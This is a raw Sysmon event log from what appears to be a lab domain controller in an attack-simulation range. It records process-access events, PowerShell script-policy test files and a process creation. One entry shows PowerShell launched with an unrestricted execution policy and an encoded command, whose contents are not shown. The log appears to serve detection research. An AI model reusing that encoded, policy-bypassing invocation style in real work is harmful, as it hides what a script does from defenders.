11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643C-6064-CA02-00000000AD01}4940C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-643C-6064-C902-00000000AD01}38844988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-643C-6064-CA02-00000000AD01}4940C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e8150069(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d34f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa5208
0857\System.Management.Automation.ni.dll+e75d312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e809b42b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e759009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75f3b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d59b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75c66d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d3c13(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d37e0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d34f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e809b42b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System
.Management.Automation.ni.dll+e75b83d8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75b794a(wow64) 154100x8000000000000000271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.377{266CAFBE-643C-6064-CA02-00000000AD01}4940C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6439-6064-4FB3-100000000000}0x10b34f0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.309{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.309{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
17141700x8000000000000000268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 11:59:56.278{266CAFBE-643C-6064-C902-00000000AD01}3884\PSHost.132616655962207645.3884.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.278{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_imetegcr.d3l.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.278{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vuh5ktuc.biw.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.262{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vuh5ktuc.biw.ps12021-03-31 11:59:56.262 10341000x8000000000000000264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.247{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-6439-6064-C602-00000000AD01}49122544C:\Windows\system32\conhost.exe{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 